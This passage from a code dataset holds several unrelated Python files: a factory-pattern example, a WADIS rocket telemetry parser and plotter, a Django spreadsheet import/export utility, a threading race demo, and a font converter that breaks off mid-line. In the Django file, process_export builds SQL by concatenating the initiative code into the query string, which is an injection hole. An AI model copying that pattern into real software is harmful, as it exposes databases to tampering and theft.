that may come in several formats (JSON, XML, ...).\n# Best practices: raise a clear ValueError for unsupported formats instead of returning None.\n\nimport xml.etree.ElementTree as etree\nimport json\n\n\nclass JSONConnector:\n\n    def __init__(self, path_file):\n        self.data = {}\n        with open(path_file, mode='r', encoding='utf-8') as f:\n            self.data = json.load(f)\n\n    @property\n    def parsed_data(self):\n        return self.data\n\n\nclass XMLConnector:\n\n    def __init__(self, path_file):\n        self.tree = etree.parse(path_file)\n\n    @property\n    def parsed_data(self):\n        return self.tree\n\n\ndef connection_factory(path_file):\n    # pick the connector class from the file extension; anything else is unsupported\n    if path_file.endswith('json'):\n        connector = JSONConnector\n    elif path_file.endswith('xml'):\n        connector = XMLConnector\n    else:\n        raise ValueError('Cannot connect to {}'.format(path_file))\n    return connector(path_file)\n\n\ndef connect_to(path_file):\n    factory = None\n    try:\n        factory = connection_factory(path_file)\n    except ValueError as e:\n        print(e)\n    return factory\n\ndef main():\n    print(\"FACTORY : sqlite\")\n    sqlite_factory = connect_to('data/person.sq3')\n\n    print(\"FACTORY: xml\")\n\n    print(\"FACTORY: json\")\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"factory_pattern.py","file_name":"factory_pattern.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"553596478","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 10 09:47:02 2015\r\n\r\n@author: 
Artur\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom scipy.interpolate import griddata, InterpolatedUnivariateSpline, UnivariateSpline, splrep, splev # for interpolation\r\nimport scipy.stats\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.gridspec as gridspec\r\nimport datetime\r\nimport os\r\nimport scipy.ndimage.filters as sf\r\nimport pdb\r\nfrom matplotlib.backends.backend_pdf import PdfPages\r\nimport sys\r\nfrom PyQt4 import QtGui\r\nfrom configobj import ConfigObj\r\nimport pdb\r\nimport cone_calibration_v13 as cc\r\nimport Tkinter\r\nimport gui_tut as gui\r\n\r\ndef value_locate(refx,x):\r\n \"\"\"\r\n Python version of IDL's useful VALUE_LOCATE procedure.\r\n \"\"\"\r\n \r\n refx=np.array(refx)\r\n x=np.atleast_1d(x)\r\n loc=np.zeros(len(x),dtype='int')\r\n\r\n for i in range(len(x)):\r\n ix=x[i]\r\n ind=((refx-ix) <= 0).nonzero()[0]\r\n if len(ind) == 0: loc[i]=-1\r\n else: loc[i]=ind[-1]\r\n\r\n return loc\r\n \r\nclass cone_current_wadis(object):\r\n\r\n\r\n def read_bin_wadis(self):\r\n \"\"\"\r\n reads binary data written in WADIS PCM standard\r\n \"\"\"\r\n app = QtGui.QApplication(sys.argv)\r\n self.fn_bin = str(QtGui.QFileDialog.getOpenFileName(None,'Open bin file', '', '*.bin'))\r\n\r\n sync_int_1 = 235 #EB\r\n sync_int_2 = 144 #90\r\n frame_length = 29\r\n \r\n \r\n \r\n \r\n data = np.array(0)\r\n with open(self.fn_bin,'rb') as f:\r\n data_b = np.fromstring(f.read(), dtype='>5\r\n self.emr = np.reshape(emr, emr.size)\r\n iem = (np.int64(byte_data_arr[:,iem_ind_msb]) <<8) | np.int64(byte_data_arr[:,iem_ind_lsb])\r\n iem = np.reshape(iem, iem.size) \r\n\r\n self.emm = 4. * emm / 65535 # V\r\n self.iem = 33.333333 * iem / 4095 # µA\r\n\r\n\r\n hka = byte_data_arr[:,hka_bit]\r\n hkd = byte_data_arr[:,hkd_bit]\r\n \r\n self.ubat = np.float32(hkd[np.int32(np.where(hka == ubat_fr)[0])])*0.5\r\n self.sth = np.float32(hkd[np.int32(np.where(hka == sth_fr)[0])])*0.1\r\n self.iinstr = np.float32(hkd[np.int32(np.where(hka == iinstr_fr)[0])])\r\n self.uigp = np.float32(hkd[np.int32(np.where(hka == uigp_fr)[0])])*15\r\n self.iigp = np.float32(hkd[np.int32(np.where(hka == iigp_fr)[0])])\r\n self.p5v = np.float32(hkd[np.int32(np.where(hka == p5v_fr)[0])])*0.05\r\n self.p12v = np.float32(hkd[np.int32(np.where(hka == p12v_fr)[0])])*0.1\r\n self.p15v = np.float32(hkd[np.int32(np.where(hka == p15v_fr)[0])])*0.1\r\n self.m12v = np.float32(hkd[np.int32(np.where(hka == m12v_fr)[0])])*(-0.1)\r\n self.m15v = np.float32(hkd[np.int32(np.where(hka == m15v_fr)[0])])*(-0.1)\r\n self.uan = np.float32(hkd[np.int32(np.where(hka == uan_fr)[0])]) \r\n self.uoff = np.float32(hkd[np.int32(np.where(hka == uoff_fr)[0])])\r\n self.ush = np.float32(hkd[np.int32(np.where(hka == ush_fr)[0])])\r\n self.temp1 = np.float32(hkd[np.int32(np.where(hka == temp1_fr)[0])])\r\n self.temp2 = np.float32(hkd[np.int32(np.where(hka == temp2_fr)[0])])\r\n self.temp3 = np.float32(hkd[np.int32(np.where(hka == temp3_fr)[0])])\r\n \r\n frame_rate = 1085.07 # frames/sec\r\n main_rate=frame_rate*3\r\n hk_rate=frame_rate/16\r\n dt_main=np.float64(1)/main_rate\r\n dt_hk=np.float64(1)/hk_rate\r\n \r\n self.liftoff=np.uint8(((byte_data_arr[:,liftoff_ind]<<7)>>7))\r\n self.format_counter = 256*256*256*np.int64((byte_data_arr[:,5]<<2)>>2)\\\r\n +256*256*np.int64(byte_data_arr[:,6])+256*np.int64(byte_data_arr[:,7])+np.int64(byte_data_arr[:,8])\r\n self.start_ind=np.asarray(np.where(self.liftoff))[0,0] \r\n \r\n \r\n self.time_main = np.arange(emm.size)*dt_main\r\n \r\n self.time_ubat = np.arange(self.ubat.size)*dt_hk\r\n self.time_sth 
= np.arange(self.sth.size)*dt_hk\r\n self.time_iinstr = np.arange(self.iinstr.size)*dt_hk\r\n self.time_uigp = np.arange(self.uigp.size)*dt_hk\r\n self.time_iigp = np.arange(self.iigp.size)*dt_hk\r\n self.time_p5v = np.arange(self.p5v.size)*dt_hk\r\n self.time_p12v = np.arange(self.p12v.size)*dt_hk\r\n self.time_p15v = np.arange(self.p15v.size)*dt_hk\r\n self.time_m12v = np.arange(self.m12v.size)*dt_hk\r\n self.time_m15v = np.arange(self.m15v.size)*dt_hk\r\n self.time_uan = np.arange(self.uan.size)*dt_hk\r\n self.time_uoff = np.arange(self.uoff.size)*dt_hk\r\n self.time_ush = np.arange(self.ush.size)*dt_hk\r\n self.time_temp1 = np.arange(self.temp1.size)*dt_hk\r\n self.time_temp2 = np.arange(self.temp2.size)*dt_hk\r\n self.time_temp3 = np.arange(self.temp3.size)*dt_hk\r\n \r\n return self.emm, self.time_main\r\n \r\n def std_current(self):\r\n \r\n emm1 = self.emm\r\n iem = self.iem\r\n time_main = self.time_main\r\n # standard deviation of EMM and IEM, input: emm, time_main, iem)\r\n\r\n barotron_resolution = 0.025\r\n\r\n n_bar_res = np.ceil( emm1.size * barotron_resolution / ( np.max(time_main) - np.min(time_main) ) )\r\n n_means = np.floor(emm1.size / n_bar_res)\r\n minus_n_emm_4bar_res = (emm1.size % n_bar_res)\r\n \r\n shape = ( n_means, n_bar_res )\r\n\r\n emm1_2d = np.reshape(emm1[minus_n_emm_4bar_res:] , shape )\r\n iem_2d = np.reshape(iem[minus_n_emm_4bar_res:] , shape )\r\n time_2d = np.reshape(time_main[minus_n_emm_4bar_res:] , shape)\r\n \r\n emm1_std = np.std(emm1_2d, axis = 1)\r\n emm1_mean = np.mean(emm1_2d, axis = 1)\r\n emm1_std_proc = 100.* ( emm1_std / emm1_mean )\r\n \r\n iem_std = np.std(iem_2d, axis = 1)\r\n iem_mean = np.mean(iem_2d, axis = 1)\r\n iem_std_proc = 100.* ( iem_std / iem_mean )\r\n time_std = time_2d[ :,0]\r\n \r\n \r\n\r\n self.emm_std_proc = emm1_std_proc\r\n self.iem_std_proc = iem_std_proc\r\n self.time_std = time_std \r\n \r\n # ;------------------------------\r\n # ; 1. calculate (max-min)/2 for compatibility with old calibrations:\r\n # ; 2. 
replace NaN-values with mean over baratron_resolution-time:\r\n # ;------------------------------\r\n # ; arrays of (max-min)/2 values:\r\n\r\n emax = np.nanmax( emm1_2d, axis = 1)\r\n emin = np.nanmin( emm1_2d, axis = 1)\r\n emima = ( emax - emin ) / 2.\r\n self.emm_maxmin = 100.* emima / emm1_mean\r\n imax = np.nanmax( iem_2d, axis = 1)\r\n imin = np.nanmin( iem_2d, axis = 1)\r\n imima = ( imax - imin ) / 2.\r\n self.iem_maxmin = 100.* imima / iem_mean \r\n \r\n return None \r\n \r\n def plot_wadis_emm(self):\r\n fig1 = plt.figure('Electrometer Mantissa')\r\n ax1 = plt.subplot(111)\r\n ax1.plot(self.time_main, self.emm, 'k', linewidth = 1.0)\r\n ax1.plot(self.time_main, self.emr, 'r', linewidth = 1.0)\r\n ax1.set_ylabel('EMM current [nA] /RSF')\r\n ax1.set_ylim([0, 5])\r\n ax1.set_title('main channels')\r\n\r\n\r\n def plot_wadis_iem(self):\r\n fig1 = plt.figure('Emission Current')\r\n ax2 = plt.subplot(211)\r\n ax2.plot(self.time_main, self.iem, 'k', linewidth = 1.0)\r\n ax2.set_ylabel('IEM [micro A]')\r\n ax2.set_ylim([0, 20])\r\n\r\n ax3 = plt.subplot(212)\r\n ax3.plot(self.time_main, self.iem, 'k', linewidth = 1.0)\r\n ax3.set_ylabel('IEM focused [micro A]')\r\n ax3.set_ylim(np.max(self.iem)-1 , np.max(self.iem))\r\n \r\n \r\n def plot_wadis_hk_igp(self):\r\n fig2 = plt.figure('HK IGP channels')\r\n\r\n ax6 = plt.subplot(211)\r\n ax6.plot(self.time_uigp, self.uigp, 'k', linewidth = 1.0)\r\n ax6.set_ylabel('U igp [V]')\r\n ax6.set_ylim([0, 3500])\r\n \r\n ax7 = plt.subplot(212)\r\n ax7.plot(self.time_iigp, self.iigp, 'k', linewidth = 1.0)\r\n ax7.set_ylabel('I igp [V]')\r\n ax7.set_ylim([0, 200])\r\n \r\n def plot_wadis_hk_rest(self):\r\n \r\n fig2 = plt.figure('hk channels')\r\n ax4 = plt.subplot(211)\r\n ax4.plot(self.time_ubat, self.ubat, 'k', linewidth = 1.0)\r\n ax4.set_ylabel('U batt [V]')\r\n ax4.set_ylim([0, 100])\r\n ax4.set_title('HK channels 1')\r\n \r\n ax5 = plt.subplot(212)\r\n ax5.plot(self.time_iinstr, self.iinstr, 'k', linewidth = 1.0)\r\n ax5.set_ylabel('I instr [V]')\r\n ax5.set_ylim([0, 200])\r\n \r\n \r\n fig3 = plt.figure('hk channels 2')\r\n ax4 = plt.subplot(411)\r\n ax4.plot(self.time_p5v, self.p5v, 'k', linewidth = 1.0)\r\n ax4.set_ylabel('+5 V')\r\n ax4.set_ylim([0, 20])\r\n ax4.set_title('HK channels 2')\r\n \r\n ax5 = plt.subplot(412)\r\n ax5.plot(self.time_p12v, self.p12v, 'k', linewidth = 1.0)\r\n ax5.set_ylabel('+12 V')\r\n ax5.set_ylim([0, 20])\r\n \r\n ax6 = plt.subplot(413)\r\n ax6.plot(self.time_p15v, self.p15v, 'k', linewidth = 1.0)\r\n ax6.set_ylabel('+ 15 V')\r\n ax6.set_ylim([0, 20])\r\n \r\n ax7 = plt.subplot(414)\r\n ax7.plot(self.time_uoff, self.uoff, 'k', linewidth = 1.0)\r\n ax7.set_ylabel('U offset [V]')\r\n ax7.set_ylim([0, 20])\r\n\r\n fig4 = plt.figure('hk channels 3')\r\n ax4 = plt.subplot(411)\r\n ax4.plot(self.time_m12v, self.m12v, 'k', linewidth = 1.0)\r\n ax4.set_ylabel('-12 V')\r\n ax4.set_ylim([-20,0])\r\n ax4.set_title('HK channels 3')\r\n \r\n ax5 = plt.subplot(412)\r\n ax5.plot(self.time_m15v, self.m15v, 'k', linewidth = 1.0)\r\n ax5.set_ylabel('-15 V')\r\n ax5.set_ylim([-20,0])\r\n \r\n ax6 = plt.subplot(413)\r\n ax6.plot(self.time_ush, self.ush, 'k', linewidth = 1.0)\r\n ax6.set_ylabel('U shield [V]')\r\n ax6.set_ylim([0, 200])\r\n \r\n ax7 = plt.subplot(414)\r\n ax7.plot(self.time_uan, self.uan, 'k', linewidth = 1.0)\r\n ax7.set_ylabel('U anode [V]')\r\n ax7.set_ylim([0, 100])\r\n \r\n fig5 = plt.figure('hk channels 4')\r\n ax4 = plt.subplot(311)\r\n ax4.plot(self.time_temp1, self.temp1, 'k', linewidth = 1.0)\r\n 
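# temp1-temp3 are plotted as raw housekeeping counts; unlike ubat or sth, no\r\n # scale factor is applied to them when they are decoded in read_bin_wadis\r\n 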
ax4.set_ylabel('temp 1')\r\n ax4.set_ylim([0,100])\r\n ax4.set_title('HK channels 4')\r\n \r\n ax5 = plt.subplot(312)\r\n ax5.plot(self.time_temp2, self.temp2, 'k', linewidth = 1.0)\r\n ax5.set_ylabel('temp 2')\r\n ax5.set_ylim([0,100])\r\n \r\n ax6 = plt.subplot(313)\r\n ax6.plot(self.time_temp3, self.temp3, 'k', linewidth = 1.0)\r\n ax6.set_ylabel('temp 3')\r\n ax6.set_ylim([0, 100])\r\n \r\n def plot_wadis_std(self):\r\n fig6 = plt.figure('Standard Deviation / min-max plots')\r\n ax4 = plt.subplot(411)\r\n ax4.plot(self.time_std, self.emm_std_proc, 'k', linewidth = 1.0)\r\n ax4.set_ylabel('EMM std./ nA')\r\n ax4.set_yscale('log')\r\n ax4.set_ylim([0.01,2])\r\n ax4.set_title('Standard Deviation / min-max plots')\r\n\r\n ax5 = plt.subplot(412)\r\n ax5.plot(self.time_std, self.iem_std_proc, 'k', linewidth = 1.0)\r\n ax5.set_ylabel('IEM Std./ $\\mu$A')\r\n ax5.set_yscale('log')\r\n ax5.set_ylim([0.01,2])\r\n \r\n ax6 = plt.subplot(413)\r\n ax6.plot(self.time_std, self.emm_maxmin, 'k', linewidth = 1.0)\r\n ax6.set_ylabel(r'EMM $\\frac{100\\cdot(max - min)}{2\\cdot mean}$')\r\n ax6.set_yscale('log')\r\n ax6.set_ylim(0.01,2)\r\n \r\n ax7 = plt.subplot(414)\r\n ax7.plot(self.time_std, self.iem_maxmin, 'k', linewidth = 1.0)\r\n ax7.set_ylabel(r'IEM $\\frac{100\\cdot(max - min)}{2\\cdot mean}$')\r\n ax7.set_yscale('log')\r\n ax7.set_ylim(0.01,2)\r\n \r\n def plot_and_save_wadis_all(self):\r\n fn_plot = self.fn_bin.split('/',10)[-1].split('.',10)[-2] + '_plot.pdf'\r\n\r\n pp = PdfPages(fn_plot)\r\n fig1 = plt.figure('main channels')\r\n ax1 = plt.subplot(311)\r\n ax1.plot(self.time_main, self.emm, 'k', linewidth = 1.0)\r\n ax1.plot(self.time_main, self.emr, 'r', linewidth = 1.0)\r\n ax1.set_ylabel('EMM current [nA] /RSF')\r\n ax1.set_ylim([0, 5])\r\n ax1.set_title('main channels')\r\n\r\n ax2 = plt.subplot(312)\r\n ax2.plot(self.time_main, self.iem, 'k', linewidth = 1.0)\r\n ax2.set_ylabel('IEM [micro A]')\r\n ax2.set_ylim([0, 20])\r\n\r\n ax3 = plt.subplot(313)\r\n ax3.plot(self.time_main, self.iem, 'k', linewidth = 1.0)\r\n ax3.set_ylabel('IEM focused [micro A]')\r\n ax3.set_ylim(np.max(self.iem)-1 , np.max(self.iem))\r\n \r\n plt.savefig(pp, format='pdf')\r\n fig2 = plt.figure('hk channels')\r\n ax4 = plt.subplot(411)\r\n ax4.plot(self.time_ubat, self.ubat, 'k', linewidth = 1.0)\r\n ax4.set_ylabel('U batt [V]')\r\n ax4.set_ylim([0, 100])\r\n ax4.set_title('HK channels 1')\r\n \r\n ax5 = plt.subplot(412)\r\n ax5.plot(self.time_iinstr, self.iinstr, 'k', linewidth = 1.0)\r\n ax5.set_ylabel('I instr [V]')\r\n ax5.set_ylim([0, 200])\r\n \r\n ax6 = plt.subplot(413)\r\n ax6.plot(self.time_uigp, self.uigp, 'k', linewidth = 1.0)\r\n ax6.set_ylabel('U igp [V]')\r\n ax6.set_ylim([0, 3500])\r\n \r\n ax7 = plt.subplot(414)\r\n ax7.plot(self.time_iigp, self.iigp, 'k', linewidth = 1.0)\r\n ax7.set_ylabel('I igp [V]')\r\n ax7.set_ylim([0, 200])\r\n \r\n plt.savefig(pp, format='pdf')\r\n \r\n fig3 = plt.figure('hk channels 2')\r\n ax4 = plt.subplot(411)\r\n ax4.plot(self.time_p5v, self.p5v, 'k', linewidth = 1.0)\r\n ax4.set_ylabel('+5 V')\r\n ax4.set_ylim([0, 20])\r\n ax4.set_title('HK channels 2')\r\n \r\n ax5 = plt.subplot(412)\r\n ax5.plot(self.time_p12v, self.p12v, 'k', linewidth = 1.0)\r\n ax5.set_ylabel('+12 V')\r\n ax5.set_ylim([0, 20])\r\n \r\n ax6 = plt.subplot(413)\r\n ax6.plot(self.time_p15v, self.p15v, 'k', linewidth = 1.0)\r\n ax6.set_ylabel('+ 15 V')\r\n ax6.set_ylim([0, 20])\r\n \r\n ax7 = plt.subplot(414)\r\n ax7.plot(self.time_uoff, self.uoff, 'k', linewidth = 1.0)\r\n ax7.set_ylabel('U offset 
[V]')\r\n ax7.set_ylim([0, 20])\r\n \r\n plt.savefig(pp, format='pdf')\r\n fig4 = plt.figure('hk channels 3')\r\n ax4 = plt.subplot(411)\r\n ax4.plot(self.time_m12v, self.m12v, 'k', linewidth = 1.0)\r\n ax4.set_ylabel('-12 V')\r\n ax4.set_ylim([-20,0])\r\n ax4.set_title('HK channels 3')\r\n \r\n ax5 = plt.subplot(412)\r\n ax5.plot(self.time_m15v, self.m15v, 'k', linewidth = 1.0)\r\n ax5.set_ylabel('-15 V')\r\n ax5.set_ylim([-20,0])\r\n \r\n ax6 = plt.subplot(413)\r\n ax6.plot(self.time_ush, self.ush, 'k', linewidth = 1.0)\r\n ax6.set_ylabel('U shield [V]')\r\n ax6.set_ylim([0, 200])\r\n \r\n ax7 = plt.subplot(414)\r\n ax7.plot(self.time_uan, self.uan, 'k', linewidth = 1.0)\r\n ax7.set_ylabel('U anode [V]')\r\n ax7.set_ylim([0, 100])\r\n \r\n plt.savefig(pp, format='pdf')\r\n \r\n fig5 = plt.figure('hk channels 4')\r\n ax4 = plt.subplot(311)\r\n ax4.plot(self.time_temp1, self.temp1, 'k', linewidth = 1.0)\r\n ax4.set_ylabel('temp 1')\r\n ax4.set_ylim([0,100])\r\n ax4.set_title('HK channels 4')\r\n \r\n ax5 = plt.subplot(312)\r\n ax5.plot(self.time_temp2, self.temp2, 'k', linewidth = 1.0)\r\n ax5.set_ylabel('temp 2')\r\n ax5.set_ylim([0,100])\r\n \r\n ax6 = plt.subplot(313)\r\n ax6.plot(self.time_temp3, self.temp3, 'k', linewidth = 1.0)\r\n ax6.set_ylabel('temp 3')\r\n ax6.set_ylim([0, 100])\r\n \r\n \r\n plt.savefig(pp, format='pdf')\r\n \r\n fig6 = plt.figure('Standard Deviation / min-max plots')\r\n ax4 = plt.subplot(411)\r\n ax4.plot(self.time_std, self.emm_std_proc, 'k', linewidth = 1.0)\r\n ax4.set_ylabel('EMM std./ nA')\r\n ax4.set_yscale('log')\r\n ax4.set_ylim([0.01,2])\r\n ax4.set_title('Standard Deviation / min-max plots')\r\n \r\n \r\n ax5 = plt.subplot(412)\r\n ax5.plot(self.time_std, self.iem_std_proc, 'k', linewidth = 1.0)\r\n ax5.set_ylabel('IEM Std./ $\\mu$A')\r\n ax5.set_yscale('log')\r\n ax5.set_ylim([0.01,2])\r\n \r\n ax6 = plt.subplot(413)\r\n ax6.plot(self.time_std, self.emm_maxmin, 'k', linewidth = 1.0)\r\n ax6.set_ylabel(r'EMM $\\frac{100\\cdot(max - min)}{2\\cdot mean}$')\r\n ax6.set_yscale('log')\r\n ax6.set_ylim(0.01,2)\r\n \r\n ax7 = plt.subplot(414)\r\n ax7.plot(self.time_std, self.iem_maxmin, 'k', linewidth = 1.0)\r\n ax7.set_ylabel(r'IEM $\\frac{100\\cdot(max - min)}{2\\cdot mean}$')\r\n ax7.set_yscale('log')\r\n ax7.set_ylim(0.01,2)\r\n \r\n plt.savefig(pp, format='pdf')\r\n \r\n pp.close()\r\n return 0\r\n \r\nif __name__ == '__main__':\r\n \r\n c = cone_current_wadis()\r\n c.read_bin_wadis()\r\n c.std_current()\r\n # g=gui.simpleapp_tk(None)\r\n \r\n# app = gui.simpleapp_tk(None)\r\n# app.title('my application')\r\n# app.mainloop()\r\n \r\n# c.plot_wadis()\r\n \r\n# app1 = QtGui.QApplication(sys.argv)\r\n# fn_ini = str(QtGui.QFileDialog.getOpenFileName(None,'Open bin file', '', '*.ini')) \r\n# pdb.set_trace()\r\n# c=cc.cone_calibration(fn_ini)\r\n# c.calibration() ","sub_path":"IAP/cone_current_wadis.py","file_name":"cone_current_wadis.py","file_ext":"py","file_size_in_byte":19373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"71138846","text":"\"\"\"\nUpload an Excel-type file and process its contents.\n\nThe File Structure is defined as\n Initiative Code\n Initiative Name\n Domain Code\n Domain\n DomainDefaultWeight\n ActivityCode\n Activity Name\n Activity Default Impact\n activity Default Likelihood\n Statement Code\n Statement\n Statement Default Weight\n\nThe upload file may have one, two, or all of Domain, FBA, Statement\n\nRead the row\nif the itemCode (unique) exists in the database, then update 
the record\nif not, create it.\n\nIf the upload file contains a Domain and an FBA, connect the FBA to that Domain in the database\nIf the upload file contains an FBA and a Statement, connect the Statement to that FBA in the database\n\n\"\"\"\n\nfrom .models import Initiative, Domain, Activity, Statement\nimport os\nimport pandas as pd\nfrom django.db import connection\nfrom django.http import HttpResponse\nfrom io import BytesIO as IO\n\n\ndef process_export(initiative_code):\n \"\"\"\n A little hairy, but it gets the job done.\n\n For this Initiative, fetch its domains (if any), their activities (if any), and their statements (if any).\n This assumes that there is a chain of command, i.e. no statements without a parent activity...\n \"\"\"\n\n # note: initiative_code is concatenated straight into the SQL string below\n query = \"select\" + \\\n \" [library_initiative].[code] as Initiative_Code\" + \\\n \", [library_initiative].[name] as Initiative_Name\" + \\\n \", [library_initiative].[description] as Initiative_Description\" + \\\n \", [library_initiative].[status] as Initiative_Status\" + \\\n \", [library_domain].[code] as Domain_Code\" + \\\n \", [library_domain].[name] as Domain_Name\" + \\\n \", [library_domain].[default_weight] as Domain_Weight\" + \\\n \", [library_activity].[code] as Activity_Code\" + \\\n \", [library_activity].[name] as Activity_Name\" + \\\n \", [library_activity].[default_impact] as Activity_Impact\" + \\\n \", [library_activity].[default_likelihood] as Activity_Weight\" + \\\n \", [library_statement].[code] as Statement_Code\" + \\\n \", [library_statement].[name] as Statement_Name\" + \\\n \", [library_statement].[default_weight] as Statement_Weight\" + \\\n \" FROM [library_initiative] LEFT OUTER JOIN [library_domain]\" + \\\n \" ON [library_domain].[parent_initiative_id] = [library_initiative].[id]\" + \\\n \" LEFT OUTER JOIN [library_activity]\" + \\\n \" ON [library_activity].[parent_domain_id] = [library_domain].[id]\" + \\\n \" LEFT OUTER JOIN [library_statement]\" + \\\n \" ON [library_statement].[parent_activity_id] = [library_activity].[id]\" + \\\n \" WHERE [library_initiative].[code] = '\" + initiative_code + \"'\"\n\n df_output = pd.read_sql(query, connection)\n\n sio = IO()\n PandasWriter = pd.ExcelWriter(sio, engine='xlsxwriter')\n df_output.to_excel(PandasWriter, sheet_name='Sheet 1')\n PandasWriter.save()\n\n sio.seek(0)\n workbook = sio.getvalue()\n\n output_file = HttpResponse(workbook)\n output_file['content-type'] = 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'\n output_file['Content-Disposition'] = 'attachment; filename=' + initiative_code + '_export.xlsx'\n\n return output_file\n\n\ndef library_upload(filename, **kwargs):\n\n \"\"\"Read file with **kwargs; files supported: xls, xlsx, csv, csv.gz, pkl\"\"\"\n\n read_map = {'xls': pd.read_excel, 'xlsx': pd.read_excel, 'csv': pd.read_csv,\n 'gz': pd.read_csv, 'pkl': pd.read_pickle}\n\n ext = os.path.splitext(filename)[1].lower()[1:]\n assert ext in read_map, \\\n \"Input file not in correct format, must be xls, xlsx, csv, csv.gz, pkl; current format '{0}'\".format(ext)\n assert os.path.isfile(filename), \"File Not Found Exception '{0}'.\".format(filename)\n\n return read_map[ext](filename, **kwargs)\n\n\ndef process_import(data):\n \"\"\" for each row of the data dataframe,\n get or create the Initiative - must be at least one.\n\n get or create the Domain - must be at least one if there are Activities\n connect it to the Initiative.\n\n get or create the Activity - must be at least one if there are Statements\n connect it to the Domain.\n\n 
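Expected upload columns, as read by the loop below: DomainCode, Domain,\n DomainDefaultWeight, FBACode, FBA, FBADefaultImpact, FBADefaultLikelihood,\n StatementCode, Statement and StatementDefaultWeight.\n\n 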
get or create the Statement if there is one in the uploaded file and\n connect it to the Activity.\n\n \"\"\"\n\n for row in data.itertuples():\n\n # handle the Domain\n if getattr(row, \"DomainCode\"):\n domain_obj, created = Domain.objects.get_or_create(code=getattr(row, \"DomainCode\"))\n # update the record either way\n domain_obj.name = getattr(row, \"Domain\")\n domain_obj.default_weight = getattr(row, \"DomainDefaultWeight\")\n domain_obj.save()\n else:\n # define null domain_obj so that the FBA does not error\n domain_obj = None\n\n # handle the FBA\n if getattr(row, \"FBACode\"):\n activity_obj, created = Activity.objects.get_or_create(code=getattr(row, \"FBACode\"))\n # update the record either way\n activity_obj.name = getattr(row, \"FBA\")\n activity_obj.parent_domain = domain_obj\n activity_obj.default_impact = getattr(row, \"FBADefaultImpact\")\n activity_obj.default_likelihood = getattr(row, \"FBADefaultLikelihood\")\n activity_obj.save()\n\n # TODO: add the TopicActivityMapping records\n else:\n # define null activity_obj so that the Statement does not error\n activity_obj = None\n\n # handle the Statement\n if getattr(row, \"StatementCode\"):\n statement_obj, created = Statement.objects.get_or_create(code=getattr(row, \"StatementCode\"))\n # update the record either way\n statement_obj.name = getattr(row, \"Statement\")\n statement_obj.parent_activity = activity_obj\n statement_obj.default_weight = getattr(row, \"StatementDefaultWeight\")\n statement_obj.save()\n","sub_path":"acuitybpa/acuitybpa/library/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":5927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"292338246","text":"import time\nfrom threading import Thread\nimport threading\nfrom threading import Semaphore\nvalue = 0\n\nsema = Semaphore(3) # up to three threads may enter the critical section at once\n\nlock = threading.Lock() # created but never acquired, so it does not prevent the race\n\n# deliberately racy read-modify-write: concurrent threads overwrite each other's\n# increments, so the printed total is usually below 100\ndef getlock():\n global value\n with sema:\n new = value +1\n time.sleep(0.001)\n value=new\n\n\nthreads = []\n\n\nfor i in range(100):\n t = Thread(target=getlock)\n t.start()\n threads.append(t)\n\nfor t in threads:\n t.join()\n\nprint(value)","sub_path":"flaskweb/test1/crash/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"529282625","text":"#!/usr/bin/python3\n#Copyright 2019 Wong Cho Ching \n#\n#Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:\n#\n#1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.\n#\n#2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.\n#\n#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport sys\n\nreadingCharacterRow = -1 #-1 = looking for first row.\n\ncharacterData = []\ncharacterOffset = 0\nwith open('font.txt', 'r') as fontFile:\n\tcharacterUnit = 1\n\tcharacter = [0,0,0,0,0]\n\tfor i in fontFile.readlines():\n\t\ti = i.replace('\\n', '')\n\t\tif readingCharacterRow == -1:\n\t\t\ti = i.strip()\n\t\t\tif len(i) == 0:\n\t\t\t\tcontinue\n\t\t\tcodePoint = int(i[0:2], 16)\n\t\t\treadingCharacterRow = 0\n\t\t\tcharacter = [0,0,0,0,0]\n\t\telse:\n\t\t\tfor c in range(5):\n\t\t\t\tcharacter[c] += (0 if i[c]==' ' else 1)*(2**readingCharacterRow)\n\t\t\tif readingCharacterRow == 7:\n\t\t\t\treadingCharacterRow = -1\n\t\t\t\tcharacterData.append((codePoint, character))\n\t\t\telse:\n\t\t\t\treadingCharacterRow += 1\n\ncharacterData = sorted(characterData)\ncharacterDataWithFiller = []\nfor codePoint in range(characterData[0][0], characterData[-1][0]+1):\n\tfor data in characterData:\n\t\tif codePoint == data[0]:\n\t\t\tcharacterDataWithFiller.append(data)\n\t\t\tbreak\n\telse:\n\t\tcharacterDataWithFiller.append((codePoint,[0,0,0,0,0]))\n\nprint('const static uint8_t FONT_DATA[][5] = {')\nfor item in characterDataWithFiller:\n\tcodePoint = item[0]\n\tdata = 